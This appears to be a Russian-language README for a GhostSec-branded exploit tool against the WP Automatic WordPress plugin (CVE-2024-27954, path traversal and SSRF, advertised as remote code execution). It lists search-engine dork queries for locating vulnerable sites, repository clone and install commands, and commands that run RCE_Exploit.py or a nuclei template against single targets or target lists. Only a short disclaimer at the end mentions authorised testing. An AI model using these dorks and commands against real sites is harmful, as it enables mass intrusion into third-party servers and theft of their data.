
Автоматический плагин для WordPress < 3.92.1 Множественные уязвимости
💀 Инструменты для автоматического выполнения удаленного кода | От GhostSec 💀
Уязвимость неправильного ограничения пути к каталогу ('Path Traversal') в WP Automatic Automatic позволяет осуществлять Path Traversal и Server Side Request Forgery. Эта проблема затрагивает Automatic: с n/a по 3.92.0.
body="wp-content/plugins/wp-automatic" && header="HTTP/1.1 200 OK"title:"wp-automatic" response.status_code:200http.title:"wp-automatic" http.status:200"/wp-content/plugins/wp-automatic"Клонируйте репозиторий:
git clone https://github.com/fa-rrel/CVE-2024-27954.git
cd CVE-2024-27954
Установите необходимые пакеты:
pip install -r requirements.txt
python RCE_Exploit.py -u <target_url> or <File.txt>
nuclei -t POC.yaml --target http://testphp.vulnweb.com/ or -l WPUrls.txt
Если вы нашли этот инструмент полезным и хотите поддержать разработку, подумайте о том, чтобы купить мне кофе:

Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированное использование против систем строго запрещено.
Этот инструмент лицензирован по лицензии MIT.